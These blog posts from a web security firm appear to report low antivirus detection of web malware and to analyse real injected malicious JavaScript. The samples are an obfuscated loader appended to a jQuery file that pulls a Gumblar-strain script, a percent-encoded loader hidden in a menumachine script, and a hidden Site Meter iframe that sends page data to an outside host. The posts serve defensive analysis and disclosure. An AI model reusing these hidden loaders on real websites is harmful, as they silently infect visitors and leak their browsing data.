AV Engines are not very effective at spotting web-based malware

There is every indication from sources internal to StopTheHacker.com and external sources comprised of web hosting companies, administrators, security companies and government organizations that the threat from web based malware is looming large and is only going to intensify in the coming years.

Website owners, and administrators, even website hosting companies are the directly affected ones. However, it is me and you, the web surfer, who visits supposedly benign sites which have been compromised by malicious individuals who are at great risk.

To protect the client, i.e. you, security experts rightly recommend antivirus (AV). These AVs are good at detecting pieces of code which have been classified and adhere to well known malicious behavior.  Consumers need to know that most of these AV engines are not tuned to detect web-based malware threats.

Below we present a small test we performed consisting of 159 unique pieces of web-based malware captured during the last few weeks by our detection systems. We compared four popular AV engines and found that none of them are very effective at detecting malware from compromised websites.

Note that all AV engines used were at the latest version available for our systems and were updates with the latest virus definitions. All samples used Javascript to execute their malicious content.

Brief highlights:
1. AV engines used: AVG, ClamAV, F-prot, Avast
2. None of the AV engines detected more than 11% of the malicious samples
3. AVG detected: 6.92%, ClamAV detected: 10.69%, F-prot detected: 10.06%, Avast detected: 2.52% of the samples respectively
4. Only one sample was detected by all four AV engines. This sample was extremely similar to a POC exploit code from milw0rm.com

This limited experiment shows that traditional AV engines have a long way to go when it comes to detecting web-based malware. Jaal uses proprietary detection technology which is based on artificial intelligence and machine learning algorithms which can understand how malicious pieces of code behave and profile and classify them with high accuracy and recall.
Read more…

News, Report, Security anti virus, injection, malicious websites, Security, suspicious code

Building on with this series of posts, which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code. The malicious code displayed this time leads to the famous “Gumblar” infection strain and can cause a lot of headaches. This particular strain is not new, but has been resurfacing in the last few weeks and hence the focus on this specific piece.

This particular example shows how a jQuery script was used by a hacker to spread malicious code. This example is a little obfuscated. This code was mined from www.i-movix.com/en/distributors/.

On line 15 you can find:

<scri pt type="text/javas cript" src="/plugins/system/ jceutilities/js/jqu ery-126.js">

Which loads the example below:

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
* $Rev: 5685 $
*/
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)
>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}

**code removed for brevity**

while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H
(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s
)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d||S;G(d.16){

**malicious code**

/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement
('scri pt');H3qqe 3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute
('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v(
)@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$
)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@
0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(
m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##
)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a
&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|
\$/ig, ''));H3 qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea
3ur6p);}} cat h(e) {}

Till next time…

Security injection, malicious websites, script, suspicious code

We have received significant requests to keep up with this series of posts which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code.

This particular example shows how a menumachine script was used by a hacker to spread malicious code. This example is a little bit different from the ones we have posted before as it does not just post the malicious code using a straight iframe or obviously understandable JavaScript. This example shows how hackers are trying just a little bit harder to inject code that is somewhat obfuscated. This code was mined from www.rvp1875.com/index.html. Take a look at the example below.

/* menumachine.js v1.7.1.1 - a component of MenuMachine (c)2004 Big Bang Software Pty Ltd :: menumachine.com*/

_ud="undefined";

if(typeof(bbMenu)==_ud)
  bbMenu=new Array();

bb_fix=new Array();

function _bbroot(bbL,name,r2L,clkOp,hRelPos,vRelPos,hRPmargin,vRPmargin,smScr,scrSp,scrAm,tri,triDn,triL,t_Hr,s_Hr,fade,posID,s_bCol,s_bW,s_bBtw,s_fFam,s_fSz,s_fWt,s_fStl,s_txAl,s_lPad,s_tPad,hOL,vOL,sArr,bCol,bw,bBtw,fFam,fSz,fWt,fStl,txAl,lPad,tPad,top_vOL,top_hOL,tArr,spc,nhlP,bUp,s_ao,ao)
{
  if(typeof(__pg)==_ud)
  {
    _b=new __bbBrChk();
    _hr=null;

    if(_b.ieDom&&!_b.mac){
      var els=document.getElementsByTagName("base");

      if(els.length){
        _hr=els[0].getAttribute("href");
      }
    }

    if(!_hr)
      _hr="";

    __pg=new _bbPg();

**code removed for brevity**

    for(var g=0;g<bbMenu.length;g++)
      bbMenu[g].off();
  }

  __bbMmB=1;
  _bbUld();
}

function _bbPg()
{
  var t=this;
  t.wn=window;
  t.d=t.wn.document;
  t.w=(_b.dt&&_b.ie)?t.d.documentElement.clientWidth:_b.ie||_b.nsDom?t.d.body.clientWidth:t.wn.innerWidth;
  t.h=(_b.dt&&_b.ie)?t.d.documentElement.clientHeight:_b.ie||_b.nsDom?t.d.body.clientHeight:t.wn.innerHeight;
  t.wn.onresize=_b.n4?_bbRzevt:_bbRePo;
}

**malicious code**

<!--
(function(hVAxp){var v120='va@72@20a@3d@22@53@63ript@45ngine@22@2c@62@
3d@22Ve@72@73i@6fn@28)+@22@2c@6a@3d@22@22@2cu@3d@6eavig@61tor@2euse@72A
ge@6et@3b@69@66((@75@2e@69n@64exOf(@22Chrome@22)@3c0)@26@26(u@2ei@6edexO
@66@28@22@57in@22@29@3e0)@26@26@28@75@2e@69@6edexO@66(@22NT@20@36@22)@3c
0)@26@26(@64o@63u@6dent@2ecoo@6b@69e@2eind@65@78Of(@22mi@65k@3d1@22)@3c@
30)@26@26(ty@70eof(@7arv@7at@73)@21@3dt@79@70e@6ff(@22A@22@29))@7bzrvzts
@3d@22@41@22@3beval(@22if@28wi@6ed@6fw@2e@22+a@2b@22)j@3dj+@22+@61+@22M@
61jor@22@2bb+a+@22Mi@6eor@22@2bb@2ba@2b@22Bu@69@6c@64@22+@62@2b@22j@3b@2
2)@3b@64ocume@6et@2ewrit@65(@22@3cscri@70t@20src@3d@2f@2fm@61rt@22@2b@22
@75@7a@2ec@6e@2fvid@2f@3fi@64@3d@22+j+@22@3e@3c@5c@2fs@63@72i@70t@3e@22)
@3b@7d';var Id4=v120.re lace(h Axp,'%');var gIl=unes cape(Id4);eval(gIl)}
)(/\@/g);
-->

Till next time..

Security injection, malicious websites, script, suspicious code

It has been a busy day. Lots of interesting things have happened over the course of the last few hours. One interesting issue which we faced today was when trying to help out on badwarebusters.org today. It seems that one of our scans popped up a script hosted by Site Meter as potentially malicious. This gets interesting because this kind of code acts as a tracker to measure how many hits a site gets, where the users are coming from, how much time they spend on a page etc. The important point being this code is deployed on tons of websites. Some of the interesting websites I visit also have this code. I was intrigued to see why this popularly used counter was popping up as suspicious.

We had a look at our logs, local dumps and analysis and saw that the Site Meter script was pushing in an iFrame pointing to dg.specificclick.net using a body-onload event to trigger the event. Interestingly, dg.spe cificclick.net, has been associated with multiple cases of Internet misdemeanor. [0] [1] [2] [3] [4]

It is surprising to see companies that have widely established customer bases to link to questionable content.

The code from the Site Meter script is presented below, the offending part is clearly visible.

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
 init:function( sCodeName, sServerName, sSecurityCode )
 ** code removed for brevity **
 onPageLoad:function()
 { 

 var newIFrame = document.createElement("iframe");
 newIFrame.frameBorder = 0;
 newIFrame.width = 0;
 newIFrame.height = 0;
 newIFrame.src = "http://dg.specif icclick.net/?u=" + encodeURIComponent(document.location) + "&r=" + encodeURIComponent(SiteMeter.getReferralURL()); 

** code removed for brevity **

SiteMeter.init('s29rottweilers', 's29.sitemeter.com', ''); 

var g_sLastCodeName = 's29rottweilers';
// ]]>

The SafeBrowsing report from Google about this site follows:

• Google SafeBrowsing report – www.schwarzerwaldrottweilers.com

Read more…

News, Report, Security iframe, injection, malware, sitemeter, suspicious code